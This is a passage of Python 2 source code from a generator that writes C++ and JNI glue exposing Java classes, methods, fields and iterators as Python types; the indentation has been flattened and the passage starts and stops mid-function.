if clsName == 'java.lang.String':
return array + 's'
if clsName == 'java.lang.Object':
return array + 'o'
return array + 'k'
def checkarg(cls):
while cls.isArray():
cls = cls.getComponentType()
if (cls.isPrimitive() or
cls.getName() in ('java.lang.String', 'java.lang.Object')):
return ''
return ', %s::initializeClass' %(typename(cls, current, False))
def callarg(cls, i):
return ', &a%d' %(i)
return (''.join([signature(param) for param in params]),
''.join([checkarg(param) for param in params]),
''.join([callarg(params[i], i) for i in xrange(len(params))]))
def construct(out, indent, cls, inCase, constructor, names):
if inCase:
line(out, indent, '{')
indent += 1
params = constructor.getParameterTypes()
count = len(params)
for i in xrange(count):
line(out, indent, '%s a%d%s;',
typename(params[i], cls, False), i,
not params[i].isPrimitive() and '((jobject) NULL)' or '')
line(out, indent, '%s object((jobject) NULL);', cppname(names[-1]))
line(out)
if count:
line(out, indent, 'if (!parseArgs(args, "%s"%s%s))',
*parseArgs(params, cls))
line(out, indent, '{')
indent += 1
line(out, indent, 'INT_CALL(object = %s(%s));',
cppname(names[-1]), ', '.join(['a%d' %(i) for i in xrange(count)]))
line(out, indent, 'self->object = object;')
if inCase:
line(out, indent, 'break;')
if count:
indent -= 1
line(out, indent, '}')
if inCase:
indent -= 1
line(out, indent, '}')
def rpartition(string, sep):
if python_ver >= '2.5.0':
return string.rpartition(sep)
else:
parts = split_pkg(string, sep)
if len(parts) == 1:
return ('', '', parts[0])
return (parts[0], sep, parts[1])
def fieldValue(cls, value, fieldType):
if fieldType.isArray():
fieldType = fieldType.getComponentType()
if fieldType.isArray():
result = 'JArray<jobject>(%s->this$).wrap(NULL)'
elif fieldType.isPrimitive():
result = '%s->wrap()'
elif fieldType.getName() == 'java.lang.String':
result = 'JArray<jstring>(%s->this$).wrap()'
else:
parts = rpartition(typename(fieldType, cls, False), '::')
result = 'JArray<jobject>(%%s->this$).wrap(%s%st_%s::wrap_jobject)' %(parts)
elif fieldType.getName() == 'java.lang.String':
result = 'j2p(*%s)'
elif not fieldType.isPrimitive():
parts = rpartition(typename(fieldType, cls, False), '::')
result = '%s%st_%s::wrap_Object(*%%s)' %(parts)
else:
return value
return result %(value)
def returnValue(cls, returnType, value):
result = RESULTS.get(returnType.getName())
if not result:
if returnType.isArray():
returnType = returnType.getComponentType()
depth = 1
while returnType.isArray():
returnType = returnType.getComponentType()
depth += 1
if depth > 1:
result = 'return JArray<jobject>(%s.this$).wrap(NULL);'
elif returnType.isPrimitive():
result = 'return %s.wrap();'
elif returnType.getName() == 'java.lang.String':
result = 'return JArray<jstring>(%s.this$).wrap();'
else:
returnName = typename(returnType, cls, False)
parts = rpartition(returnName, '::')
result = 'return JArray<jobject>(%%s.this$).wrap(%s%st_%s::wrap_jobject);' %(parts)
else:
returnName = typename(returnType, cls, False)
parts = rpartition(returnName, '::')
result = 'return %s%st_%s::wrap_Object(%%s);' %(parts)
return result %(value)
def call(out, indent, cls, inCase, method, names, cardinality, isExtension):
if inCase:
line(out, indent, '{')
indent += 1
name = method.getName()
modifiers = method.getModifiers()
params = method.getParameterTypes()
returnType = method.getReturnType()
count = len(params)
for i in xrange(count):
line(out, indent, '%s a%d%s;',
typename(params[i], cls, False), i,
not params[i].isPrimitive() and '((jobject) NULL)' or '')
returnName = returnType.getName()
if returnName != 'void':
line(out, indent, '%s result%s;',
typename(returnType, cls, False),
not returnType.isPrimitive() and '((jobject) NULL)' or '')
result = 'result = '
else:
result = ''
if cardinality and (count or not inCase):
s = cardinality > 1 and 's' or ''
line(out)
if isExtension and name == 'clone' and Modifier.isNative(modifiers):
line(out, indent, 'if (arg)')
else:
line(out, indent, 'if (!parseArg%s(arg%s, "%s"%s%s))',
s, s, *parseArgs(params, cls))
line(out, indent, '{')
indent += 1
name = cppname(name)
if Modifier.isStatic(modifiers):
line(out, indent, 'OBJ_CALL(%s%s::%s(%s));',
result, '::'.join(cppnames(names)), name,
', '.join(['a%d' %(i) for i in xrange(count)]))
else:
line(out, indent, 'OBJ_CALL(%sself->object.%s(%s));',
result, name, ', '.join(['a%d' %(i) for i in xrange(count)]))
if isExtension and name == 'clone' and Modifier.isNative(modifiers):
line(out)
line(out, indent, '%s object(result.this$);', typename(cls, cls, False))
line(out, indent, 'if (PyObject_TypeCheck(arg, &FinalizerProxy$$Type) &&')
line(out, indent, ' PyObject_TypeCheck(((t_fp *) arg)->object, self->ob_type))')
line(out, indent, '{')
line(out, indent + 1, 'PyObject *_arg = ((t_fp *) arg)->object;')
line(out, indent + 1, '((t_JObject *) _arg)->object = object;')
line(out, indent + 1, 'Py_INCREF(_arg);')
line(out, indent + 1, 'object.pythonExtension((jlong) (Py_intptr_t) (void *) _arg);')
line(out, indent + 1, 'Py_INCREF(arg);')
line(out, indent + 1, 'return arg;')
line(out, indent, '}')
line(out, indent, 'return PyErr_SetArgsError("%s", arg);' %(name))
elif returnName != 'void':
line(out, indent, returnValue(cls, returnType, 'result'))
else:
line(out, indent, 'Py_RETURN_NONE;')
if cardinality and (count or not inCase):
indent -= 1
line(out, indent, '}')
if inCase:
indent -= 1
line(out, indent, '}')
def methodargs(methods, superMethods):
if len(methods) == 1 and methods[0].getName() not in superMethods:
count = len(methods[0].getParameterTypes())
if count == 0:
return '', '', 0
elif count == 1:
return ', PyObject *arg', ', arg', 1
return ', PyObject *args', ', args', 2
def jniname(cls):
if cls.isPrimitive():
name = cls.getName()
if name != 'void':
name = 'j' + name
else:
name = 'jobject'
return name
def jniargs(params):
count = len(params)
decls = ', '.join(['%s a%d' %(jniname(params[i]), i)
for i in xrange(count)])
if decls:
return ', ' + decls
return ''
def extension(env, out, indent, cls, names, name, count, method):
line(out, indent, 'jlong ptr = jenv->CallLongMethod(jobj, %s::mids$[%s::mid_pythonExtension_%s]);',
cppname(names[-1]), cppname(names[-1]), env.strhash('()J'))
line(out, indent, 'PyObject *obj = (PyObject *) (Py_intptr_t) ptr;')
if name == 'pythonDecRef':
line(out)
line(out, indent, 'if (obj != NULL)')
line(out, indent, '{')
line(out, indent + 1, 'jenv->CallVoidMethod(jobj, %s::mids$[%s::mid_pythonExtension_%s], (jlong) 0);',
cppname(names[-1]), cppname(names[-1]), env.strhash('(J)V'))
line(out, indent + 1, 'env->finalizeObject(jenv, obj);')
line(out, indent, '}')
return
line(out, indent, 'PythonGIL gil(jenv);')
returnType = method.getReturnType()
returnName = returnType.getName()
if returnName != 'void':
line(out, indent, '%s value%s;',
typename(returnType, cls, False),
not returnType.isPrimitive() and '((jobject) NULL)' or '')
sigs = []
decrefs = []
args = []
i = 0
for param in method.getParameterTypes():
typeName = param.getName()
if typeName in CALLARGS:
sig, code, decref = CALLARGS[typeName]
elif param.isArray():
param = param.getComponentType()
if param.isPrimitive():
code = 'JArray<j%s>(%%s).wrap()' %(param.getName())
elif param.isArray():
code = 'JArray<jobject>(%s).wrap(NULL)'
elif param.getName() == 'java.lang.String':
code = 'JArray<jstring>(%s).wrap()'
else:
parts = rpartition(typename(param, cls, False), '::')
code = 'JArray<jobject>(%%s).wrap(%s%st_%s::wrap_jobject)' %(parts)
sig, decref = 'O', True
elif param.getName() == 'java.lang.String':
sig, code, decref = 'O', 'j2p(%%s))', True
else:
parts = rpartition(typename(param, cls, False), '::')
sig, code, decref = 'O', '%s%st_%s::wrap_Object(%s%s%s(%%s))' %(parts*2), True
if sig == 'O':
line(out, indent, 'PyObject *o%d = %s;', i, code %('a%d' %(i)))
args.append('o%d' %(i))
else:
args.append(code %('a%d' %(i)))
sigs.append(sig)
decrefs.append(decref)
i += 1
args = ', '.join(args)
if args:
args = ', ' + args
line(out, indent, 'PyObject *result = PyObject_CallMethod(obj, "%s", "%s"%s);',
name, ''.join(sigs), args)
i = 0
for decref in decrefs:
if decref:
line(out, indent, 'Py_DECREF(o%d);', i)
i += 1
line(out, indent, 'if (!result)')
line(out, indent + 1, 'throwPythonError();')
if returnName == 'void':
line(out, indent, 'else')
line(out, indent + 1, 'Py_DECREF(result);')
else:
signature, check, x = parseArgs([returnType], cls)
line(out, indent, 'else if (parseArg(result, "%s"%s, &value))',
signature, check)
line(out, indent, '{')
line(out, indent + 1, 'throwTypeError("%s", result);', name)
line(out, indent + 1, 'Py_DECREF(result);')
line(out, indent, '}')
line(out, indent, 'else')
line(out, indent, '{')
if not returnType.isPrimitive():
line(out, indent + 1, 'jobj = jenv->NewLocalRef(value.this$);')
line(out, indent + 1, 'Py_DECREF(result);')
if returnType.isPrimitive():
line(out, indent + 1, 'return value;')
else:
line(out, indent + 1, 'return jobj;')
line(out, indent, '}')
line(out)
if returnType.isPrimitive():
line(out, indent, 'return (j%s) 0;', returnName)
else:
line(out, indent, 'return (jobject) NULL;')
def python(env, out_h, out, cls, superCls, names, superNames,
constructors, methods, protectedMethods, fields, instanceFields,
mapping, sequence, rename, declares, typeset, excludes, moduleName):
line(out_h)
line(out_h, 0, '#include <Python.h>')
line(out_h)
indent = 0
for name in names[:-1]:
line(out_h, indent, 'namespace %s {', cppname(name))
indent += 1
line(out_h, indent, 'extern PyTypeObject %s$$Type;', names[-1])
line(out_h)
line(out_h, indent, 'class t_%s {', names[-1])
line(out_h, indent, 'public:')
line(out_h, indent + 1, 'PyObject_HEAD')
line(out_h, indent + 1, '%s object;', cppname(names[-1]))
line(out_h, indent + 1, 'static PyObject *wrap_Object(const %s&);',
cppname(names[-1]))
line(out_h, indent + 1, 'static PyObject *wrap_jobject(const jobject&);')
line(out_h, indent + 1, 'static void install(PyObject *module);')
line(out_h, indent + 1, 'static void initialize(PyObject *module);')
line(out_h, indent, '};')
iterator = findClass('java/util/Iterator')
enumeration = findClass('java/util/Enumeration')
while indent:
indent -= 1
line(out_h, indent, '}')
line(out)
line(out, 0, '#include "structmember.h"')
line(out, 0, '#include "functions.h"')
line(out, 0, '#include "macros.h"')
for inner in cls.getDeclaredClasses():
if inner in typeset and not inner in declares:
if Modifier.isStatic(inner.getModifiers()):
line(out, 0, '#include "%s.h"',
inner.getName().replace('.', '/'))
for method in methods:
if method.getName() == 'pythonExtension':
isExtension = True
break
else:
isExtension = False
line(out)
indent = 0
for name in names[:-1]:
line(out, indent, 'namespace %s {', cppname(name))
indent += 1
if not isExtension:
line(out, indent, 'static PyObject *t_%s_cast_(PyTypeObject *type, PyObject *arg);', names[-1])
line(out, indent, 'static PyObject *t_%s_instance_(PyTypeObject *type, PyObject *arg);', names[-1])
if constructors:
line(out, indent, 'static int t_%s_init_(t_%s *self, PyObject *args, PyObject *kwds);', names[-1], names[-1])
constructorName = 't_%s_init_' %(names[-1])
else:
constructorName = 'abstract_init'
if superCls:
superMethods = set([method.getName()
for method in superCls.getMethods()])
else:
superMethods = ()
allMethods = {}
extMethods = {}
propMethods = {}
if methods:
for method in methods:
modifiers = method.getModifiers()
name = method.getName()
params = method.getParameterTypes()
superMethod = None
isNative = Modifier.isNative(modifiers)
isStatic = Modifier.isStatic(modifiers)
if (isExtension and not isStatic and superCls and isNative):
superMethod = find_method(superCls, name, params)
if isExtension and isNative and not isStatic:
extMethods.setdefault(name, []).append(method)
if superMethod or not (isExtension and isNative and not isStatic):
if isStatic:
if name in allMethods:
if Modifier.isStatic(allMethods[name][0].getModifiers()):
allMethods[name].append(method)
elif name + '_' in allMethods:
allMethods[name + '_'].append(method)
else:
print >>sys.stderr, " Warning: renaming static method '%s' on class %s to '%s_' since it is shadowed by non-static method of same name." %(name, '.'.join(names), name)
allMethods[name + '_'] = [method]
else:
allMethods[name] = [method]
else:
if name in allMethods:
if Modifier.isStatic(allMethods[name][0].getModifiers()):
print >>sys.stderr, " Warning: renaming static method '%s' on class %s to '%s_' since it is shadowed by non-static method of same name." %(name, '.'.join(names), name)
allMethods[name + '_'] = allMethods[name]
allMethods[name] = [method]
else:
allMethods[name].append(method)
else:
allMethods[name] = [method]
if not (isExtension and isNative):
nameLen = len(name)
paramsLen = len(params)
if nameLen > 3 and paramsLen == 0 and name.startswith('get'):
propMethods.setdefault(name[3].lower() + name[4:],
[]).append(method)
elif nameLen > 3 and paramsLen == 1 and name.startswith('set'):
propMethods.setdefault(name[3].lower() + name[4:],
[]).append(method)
elif nameLen > 2 and paramsLen == 0 and name.startswith('is'):
propMethods.setdefault(name[2].lower() + name[3:],
[]).append(method)
properties = set([name for name in propMethods.iterkeys()
if name not in allMethods])
propMethods = [(name, propMethods[name]) for name in properties]
sort(propMethods, key=lambda x: x[0])
extMethods = extMethods.items()
sort(extMethods, key=lambda x: x[0])
allMethods = allMethods.items()
sort(allMethods, key=lambda x: x[0])
iteratorMethod = None
iteratorExt = False
nextMethod = None
nextExt = False
nextElementMethod = None
nextElementExt = False
mappingMethod = None
if mapping:
mappingName, mappingSig = mapping.split(':')
sequenceLenMethod = None
sequenceGetMethod = None
if sequence:
sequenceLenName, sequenceLenSig = sequence[0].split(':')
sequenceGetName, sequenceGetSig = sequence[1].split(':')
for name, methods in allMethods:
args, x, cardinality = methodargs(methods, superMethods)
sort(methods, key=lambda x: len(x.getParameterTypes()))
method = methods[0]
modifiers = method.getModifiers()
if name == 'iterator' and iteratorMethod is None:
if (not method.getParameterTypes() and
iterator.isAssignableFrom(method.getReturnType())):
iteratorMethod = method
elif name == 'next' and nextMethod is None:
if (not method.getParameterTypes() and
not method.getReturnType().isPrimitive()):
nextMethod = method
elif name == 'nextElement' and nextElementMethod is None:
if (not method.getParameterTypes() and
not method.getReturnType().isPrimitive()):
nextElementMethod = method
elif mapping and name == mappingName and mappingMethod is None:
if signature(method) == mappingSig:
mappingMethod = (method, cardinality)
elif sequence and name == sequenceLenName and sequenceLenMethod is None:
if signature(method) == sequenceLenSig:
sequenceLenMethod = (method, cardinality)
elif sequence and name == sequenceGetName and sequenceGetMethod is None:
if signature(method) == sequenceGetSig:
sequenceGetMethod = (method, cardinality)
elif isExtension and name == 'clone' and Modifier.isNative(modifiers):
args, x, cardinality = ', PyObject *arg', ', arg', 1
if Modifier.isStatic(modifiers):
line(out, indent, 'static PyObject *t_%s_%s(PyTypeObject *type%s);',
names[-1], name, args)
else:
line(out, indent, 'static PyObject *t_%s_%s(t_%s *self%s);',
names[-1], name, names[-1], args)
for name, methods in extMethods:
args, x, cardinality = methodargs(methods, superMethods)
sort(methods, key=lambda x: len(x.getParameterTypes()))
method = methods[0]
modifiers = method.getModifiers()
if name == 'iterator' and iteratorMethod is None:
if (not method.getParameterTypes() and
iterator.isAssignableFrom(method.getReturnType())):
iteratorMethod = method
iteratorExt = True
elif name == 'next' and nextMethod is None:
if (not method.getParameterTypes() and
not method.getReturnType().isPrimitive()):
nextMethod = method
nextExt = True
elif name == 'nextElement' and nextElementMethod is None:
if (not method.getParameterTypes() and
not method.getReturnType().isPrimitive()):
nextElementMethod = method
nextElementExt = True
if isExtension:
count = 0
for name, methods in extMethods:
for method in methods:
line(out, indent,
'static %s JNICALL t_%s_%s%d(JNIEnv *jenv, jobject jobj%s);',
jniname(method.getReturnType()), names[-1], name, count,
jniargs(method.getParameterTypes()))
count += 1
line(out, indent, 'static PyObject *t_%s_get__self(t_%s *self, void *data);', names[-1], names[-1])
if instanceFields:
for field in instanceFields:
fieldName = field.getName()
if fieldName not in properties:
line(out, indent, 'static PyObject *t_%s_get__%s(t_%s *self, void *data);',
names[-1], fieldName, names[-1])
if not Modifier.isFinal(field.getModifiers()):
line(out, indent, 'static int t_%s_set__%s(t_%s *self, PyObject *arg, void *data);',
names[-1], field.getName(), names[-1])
line(out)
for fieldName, methods in propMethods:
getter = False
setter = False
for method in methods:
methodName = method.getName()
if not getter and (methodName.startswith('get') or
methodName.startswith('is')):
getter = True
line(out, indent, 'static PyObject *t_%s_get__%s(t_%s *self, void *data);',
names[-1], fieldName, names[-1])
elif not setter and methodName.startswith('set'):
setter = True
line(out, indent, 'static int t_%s_set__%s(t_%s *self, PyObject *arg, void *data);',
names[-1], fieldName, names[-1])
if instanceFields or propMethods or isExtension:
line(out, indent, 'static PyGetSetDef t_%s__fields_[] = {', names[-1])
for field in instanceFields:
fieldName = field.getName()
if fieldName not in properties:
if Modifier.isFinal(field.getModifiers()):
line(out, indent + 1, 'DECLARE_GET_FIELD(t_%s, %s),',
names[-1], fieldName)
else:
line(out, indent + 1, 'DECLARE_GETSET_FIELD(t_%s, %s),',
names[-1], fieldName)
for fieldName, methods in propMethods:
getter = False
setter = False
for method in methods:
methodName = method.getName()
if not getter and (methodName.startswith('get') or
methodName.startswith('is')):
getter = True
elif not setter and methodName.startswith('set'):
setter = True
if getter and setter:
op = 'GETSET'
elif getter:
op = 'GET'
elif setter:
op = 'SET'
line(out, indent + 1, 'DECLARE_%s_FIELD(t_%s, %s),',
op, names[-1], fieldName)
if isExtension:
line(out, indent + 1, 'DECLARE_GET_FIELD(t_%s, self),', names[-1])
line(out, indent + 1, '{ NULL, NULL, NULL, NULL, NULL }')
line(out, indent, '};')
line(out)
line(out, indent, 'static PyMethodDef t_%s__methods_[] = {', names[-1])
if not isExtension:
line(out, indent + 1,
'DECLARE_METHOD(t_%s, cast_, METH_O | METH_CLASS),', names[-1])
line(out, indent + 1,
'DECLARE_METHOD(t_%s, instance_, METH_O | METH_CLASS),', names[-1])
for name, methods in allMethods:
modifiers = methods[0].getModifiers()
if len(methods) == 1 and not name in superMethods:
count = len(methods[0].getParameterTypes())
if count == 0:
args = 'METH_NOARGS'
elif count == 1:
args = 'METH_O'
else:
args = 'METH_VARARGS'
elif isExtension and name == 'clone' and Modifier.isNative(modifiers):
args = 'METH_O'
else:
args = 'METH_VARARGS'
if Modifier.isStatic(modifiers):
args += ' | METH_CLASS'
line(out, indent + 1, 'DECLARE_METHOD(t_%s, %s, %s),',
names[-1], name, args)
line(out, indent + 1, '{ NULL, NULL, 0, NULL }')
line(out, indent, '};')
if instanceFields or propMethods or isExtension:
tp_getset = 't_%s__fields_' %(names[-1])
else:
tp_getset = '0'
if iteratorMethod:
if iteratorExt:
tp_iter = 'get_extension_iterator'
else:
tp_iter = '((PyObject *(*)(t_%s *)) get_iterator<t_%s>)' %(names[-1], names[-1])
tp_iternext = '0'
elif nextMethod and iterator.isAssignableFrom(cls):
tp_iter = 'PyObject_SelfIter'
returnName = typename(nextMethod.getReturnType(), cls, False)
ns, sep, n = rpartition(returnName, '::')
if nextExt:
tp_iternext = 'get_extension_next'
else:
tp_iternext = '((PyObject *(*)(java::util::t_Iterator *)) get_iterator_next<java::util::t_Iterator,%s%st_%s,%s>)' %(ns, sep, n, returnName)
elif nextElementMethod and enumeration.isAssignableFrom(cls):
tp_iter = 'PyObject_SelfIter'
returnName = typename(nextElementMethod.getReturnType(), cls, False)
ns, sep, n = rpartition(returnName, '::')
if nextElementExt:
tp_iternext = 'get_extension_nextElement'
else:
tp_iternext = '((PyObject *(*)(java::util::t_Enumeration *)) get_enumeration_next<java::util::t_Enumeration,%s%st_%s,%s>)' %(ns, sep, n, returnName)
elif nextMethod:
tp_iter = 'PyObject_SelfIter'
returnName = typename(nextMethod.getReturnType(), cls, False)
ns, sep, n = rpartition(returnName, '::')
if nextExt:
tp_iternext = 'get_extension_next'
else:
tp_iternext = '((PyObject *(*)(t_%s *)) get_next<t_%s,%s%st_%s,%s>)' %(names[-1], names[-1], ns, sep, n, returnName)
else:
tp_iter = '0'
tp_iternext = '0'
if mappingMethod:
method, cardinality = mappingMethod
if cardinality > 1:
getName = 't_%s_%s_map_' %(names[-1], method.getName())
line(out, indent, 'static PyObject *%s(t_%s *self, PyObject *key);',
getName, names[-1])
else:
getName = 't_%s_%s' %(names[-1], method.getName())
line(out)
line(out, indent, 'static PyMappingMethods t_%s_as_mapping = {',
names[-1])
line(out, indent + 1, '0,')
line(out, indent + 1, '(binaryfunc) %s,', getName)
line(out, indent + 1, '0,')
line(out, indent, '};')
tp_as_mapping = '&t_%s_as_mapping' %(names[-1])
else:
tp_as_mapping = '0'
if sequenceLenMethod or sequenceGetMethod:
if sequenceLenMethod:
method, cardinality = sequenceLenMethod
lenName = 't_%s_%s_seq_' %(names[-1], method.getName())
line(out, indent, 'static int %s(t_%s *self);', lenName, names[-1])
else:
lenName = '0'
if sequenceGetMethod:
method, cardinality = sequenceGetMethod
getName = 't_%s_%s_seq_' %(names[-1], method.getName())
line(out, indent, 'static PyObject *%s(t_%s *self, int n);',
getName, names[-1])
else:
getName = '0'
line(out)
line(out, indent, 'static PySequenceMethods t_%s_as_sequence = {',
names[-1])
if python_ver < '2.5.0':
line(out, indent + 1, '(inquiry) %s,', lenName)
line(out, indent + 1, '0,')
line(out, indent + 1, '0,')
line(out, indent + 1, '(intargfunc) %s', getName)
line(out, indent, '};')
else:
line(out, indent + 1, '(lenfunc) %s,', lenName)
line(out, indent + 1, '0,')
line(out, indent + 1, '0,')
line(out, indent + 1, '(ssizeargfunc) %s', getName)
line(out, indent, '};')
tp_as_sequence = '&t_%s_as_sequence' %(names[-1])
else:
tp_as_sequence = '0'
if len(superNames) > 1:
base = '::'.join(('::'.join(cppnames(superNames[:-1])), superNames[-1]))
else:
base = superNames[-1]
line(out)
line(out, indent, 'DECLARE_TYPE(%s, t_%s, %s, %s, %s, %s, %s, %s, %s, %s);',
names[-1], names[-1], base, cppname(names[-1]), constructorName,
tp_iter, tp_iternext, tp_getset, tp_as_mapping, tp_as_sequence)
line(out)
line(out, indent, 'void t_%s::install(PyObject *module)', names[-1])
line(out, indent, '{')
line(out, indent + 1, 'installType(&%s$$Type, module, "%s", %d);',
names[-1], rename or names[-1], isExtension and 1 or 0)
for inner in cls.getDeclaredClasses():
if inner in typeset:
if Modifier.isStatic(inner.getModifiers()):
innerName = inner.getName().split('.')[-1]
line(out, indent + 1, 'PyDict_SetItemString(%s$$Type.tp_dict, "%s", make_descriptor(&%s$$Type));',
names[-1], innerName[len(names[-1])+1:], innerName)
line(out, indent, '}')
line(out)
line(out, indent, 'void t_%s::initialize(PyObject *module)', names[-1])
line(out, indent, '{')
line(out, indent + 1, 'PyDict_SetItemString(%s$$Type.tp_dict, "class_", make_descriptor(%s::initializeClass));',
names[-1], cppname(names[-1]))
line(out, indent + 1, 'PyDict_SetItemString(%s$$Type.tp_dict, "wrapfn_", make_descriptor(t_%s::wrap_jobject));',
names[-1], names[-1])
if isExtension:
line(out, indent + 1, 'jclass cls = %s::initializeClass();',
cppname(names[-1]))
elif fields:
line(out, indent + 1, '%s::initializeClass();', cppname(names[-1]))
if isExtension:
count = 0
line(out, indent + 1, 'JNINativeMethod methods[] = {')
for name, methods in extMethods:
for method in methods:
line(out, indent + 2, '{ "%s", "%s", (void *) t_%s_%s%d },',
name, signature(method), names[-1], name, count)
count += 1
line(out, indent + 1, '};')
line(out, indent + 1, 'env->registerNatives(cls, methods, %d);',
count)
for field in fields:
fieldType = field.getType()
fieldName = field.getName()
value = '%s::%s' %(cppname(names[-1]), cppname(fieldName))
value = fieldValue(cls, value, fieldType)
line(out, indent + 1, 'PyDict_SetItemString(%s$$Type.tp_dict, "%s", make_descriptor(%s));',
names[-1], fieldName, value)
line(out, indent, '}')
if not isExtension:
line(out)
line(out, indent, 'static PyObject *t_%s_cast_(PyTypeObject *type, PyObject *arg)', names[-1])
line(out, indent, '{')
line(out, indent + 1, 'if (!(arg = castCheck(arg, %s::initializeClass, 1)))', cppname(names[-1]))
line(out, indent + 2, 'return NULL;')
line(out, indent + 1, 'return t_%s::wrap_Object(%s(((t_%s *) arg)->object.this$));', names[-1], cppname(names[-1]), names[-1])
line(out, indent, '}')
line(out, indent, 'static PyObject *t_%s_instance_(PyTypeObject *type, PyObject *arg)', names[-1])
line(out, indent, '{')
line(out, indent + 1, 'if (!castCheck(arg, %s::initializeClass, 0))', cppname(names[-1]))
line(out, indent + 2, 'Py_RETURN_FALSE;')
line(out, indent + 1, 'Py_RETURN_TRUE;')
line(out, indent, '}')
if constructors:
line(out)
line(out, indent, 'static int t_%s_init_(t_%s *self, PyObject *args, PyObject *kwds)', names[-1], names[-1])
line(out, indent, '{')
if len(constructors) > 1:
currLen = -1
line(out, indent + 1, 'switch (PyTuple_GET_SIZE(args)) {')
withErr = False
for constructor in constructors:
params = constructor.getParameterTypes()
if len(params) != currLen:
if currLen >= 0:
withErr = True
line(out, indent + 2, 'goto err;')
currLen = len(params)
line(out, indent + 1, '%scase %d:', HALF_INDENT, currLen)
construct(out, indent + 2, cls, True, constructor, names)
line(out, indent + 1, '%sdefault:', HALF_INDENT)
if withErr:
line(out, indent + 1, '%serr:', HALF_INDENT)
line(out, indent + 2, 'PyErr_SetArgsError((PyObject *) self, "__init__", args);')
line(out, indent + 2, 'return -1;')
line(out, indent + 1, '}')
else:
construct(out, indent + 1, cls, False, constructors[0], names)
if constructors[0].getParameterTypes():
line(out, indent + 1, 'else')
line(out, indent + 1, '{')
line(out, indent + 2, 'PyErr_SetArgsError((PyObject *) self, "__init__", args);')
line(out, indent + 2, 'return -1;')
line(out, indent + 1, '}')
if isExtension:
line(out)
line(out, indent + 1, 'Py_INCREF((PyObject *) self);')
line(out, indent + 1, 'self->object.pythonExtension((jlong) (Py_intptr_t) (void *) self);')
line(out)
line(out, indent + 1, 'return 0;')
line(out, indent , '}')
for name, methods in allMethods:
line(out)
modifiers = methods[0].getModifiers()
if isExtension and name == 'clone' and Modifier.isNative(modifiers):
declargs, args, cardinality = ', PyObject *arg', ', arg', 1
else:
declargs, args, cardinality = methodargs(methods, superMethods)
static = Modifier.isStatic(modifiers)
if static:
line(out, indent, 'static PyObject *t_%s_%s(PyTypeObject *type%s)',
names[-1], name, declargs)
else:
line(out, indent, 'static PyObject *t_%s_%s(t_%s *self%s)',
names[-1], name, names[-1], declargs)
line(out, indent, '{')
if len(methods) > 1:
currLen = -1
line(out, indent + 1, 'switch (PyTuple_GET_SIZE(args)) {')
for method in methods:
params = method.getParameterTypes()
if len(params) != currLen:
if currLen >= 0:
line(out, indent + 2, 'break;')
currLen = len(params)
line(out, indent + 1, '%scase %d:', HALF_INDENT, currLen)
call(out, indent + 2, cls, True, method, names, cardinality,
isExtension)
line(out, indent + 1, '}')
else:
call(out, indent + 1, cls, False, methods[0], names, cardinality,
isExtension)
if args:
line(out)
if name in superMethods:
if static:
line(out, indent + 1, 'return callSuper(type, "%s"%s, %d);',
name, args, cardinality)
else:
line(out, indent + 1, 'return callSuper(&%s$$Type, (PyObject *) self, "%s"%s, %d);',
names[-1], name, args, cardinality)
else:
line(out, indent + 1, 'PyErr_SetArgsError(%s, "%s"%s);',
static and 'type' or '(PyObject *) self', name, args)
line(out, indent + 1, 'return NULL;')
line(out, indent, '}')
if isExtension:
count = 0
for name, methods in extMethods:
for method in methods:
line(out)
line(out, indent,
'static %s JNICALL t_%s_%s%d(JNIEnv *jenv, jobject jobj%s)',
jniname(method.getReturnType()), names[-1], name, count,
jniargs(method.getParameterTypes()))
count += 1
line(out, indent, '{')
extension(env, out, indent + 1, cls, names, name, count, method)
line(out, indent, '}')
line(out)
line(out, indent, 'static PyObject *t_%s_get__self(t_%s *self, void *data)',
names[-1], names[-1])
line(out, indent, '{')
indent += 1
line(out, indent, 'jlong ptr;')
line(out, indent, 'OBJ_CALL(ptr = self->object.pythonExtension());')
line(out, indent, 'PyObject *obj = (PyObject *) (Py_intptr_t) ptr;')
line(out)
line(out, indent, 'if (obj != NULL)')
line(out, indent, '{')
line(out, indent + 1, 'Py_INCREF(obj);')
line(out, indent + 1, 'return obj;')
line(out, indent, '}')
line(out, indent, 'else')
line(out, indent + 1, 'Py_RETURN_NONE;')
indent -= 1
line(out, indent, '}')
if instanceFields:
for field in instanceFields:
fieldName = field.getName()
if fieldName not in properties:
line(out)
fieldType = field.getType()
typeName = typename(fieldType, cls, False)
line(out, indent, 'static PyObject *t_%s_get__%s(t_%s *self, void *data)',
names[-1], fieldName, names[-1])
line(out, indent, '{')
line(out, indent + 1, '%s value%s;', typeName,
not fieldType.isPrimitive() and '((jobject) NULL)' or '')
line(out, indent + 1, 'OBJ_CALL(value = self->object._get_%s());',
fieldName)
line(out, indent + 1, returnValue(cls, fieldType, 'value'))
line(out, indent, '}')
if not Modifier.isFinal(field.getModifiers()):
line(out, indent, 'static int t_%s_set__%s(t_%s *self, PyObject *arg, void *data)',
names[-1], fieldName, names[-1])
line(out, indent, '{')
line(out, indent + 1, '%s value%s;', typeName,
not fieldType.isPrimitive() and '((jobject) NULL)' or '')
sig, check, x = parseArgs([fieldType], cls)
line(out, indent + 1, 'if (!parseArg(arg, "%s"%s, &value))',
sig, check)
line(out, indent + 1, '{')
line(out, indent + 2, 'INT_CALL(self->object._set_%s(value));',
fieldName)
line(out, indent + 2, 'return 0;')
line(out, indent + 1, '}')
line(out, indent + 1, 'PyErr_SetArgsError((PyObject *) self, "%s", arg);',
fieldName)
line(out, indent + 1, 'return -1;')
line(out, indent, '}')
if propMethods:
for fieldName, methods in propMethods:
line(out)
getter = None
setters = []
sort(methods, key=lambda x: x.getName())
for method in methods:
methodName = method.getName()
if not getter and (methodName.startswith('get') or
methodName.startswith('is')):
getter = method
elif methodName.startswith('set'):
setters.append(method)
if getter:
methodName = getter.getName()
returnType = getter.getReturnType()
typeName = typename(returnType, cls, False)
line(out, indent, 'static PyObject *t_%s_get__%s(t_%s *self, void *data)',
names[-1], fieldName, names[-1])
line(out, indent, '{')
line(out, indent + 1, '%s value%s;', typeName,
not returnType.isPrimitive() and '((jobject) NULL)' or '')
line(out, indent + 1, 'OBJ_CALL(value = self->object.%s());',
methodName)
line(out, indent + 1, returnValue(cls, returnType, 'value'))
line(out, indent, '}')
if setters:
line(out, indent, 'static int t_%s_set__%s(t_%s *self, PyObject *arg, void *data)',
names[-1], fieldName, names[-1])
line(out, indent, '{')
methodName = setters[0].getName()
for method in setters:
argType = method.getParameterTypes()[0]
typeName = typename(argType, cls, False)
line(out, indent + 1, '{')
line(out, indent + 2, '%s value%s;', typeName,
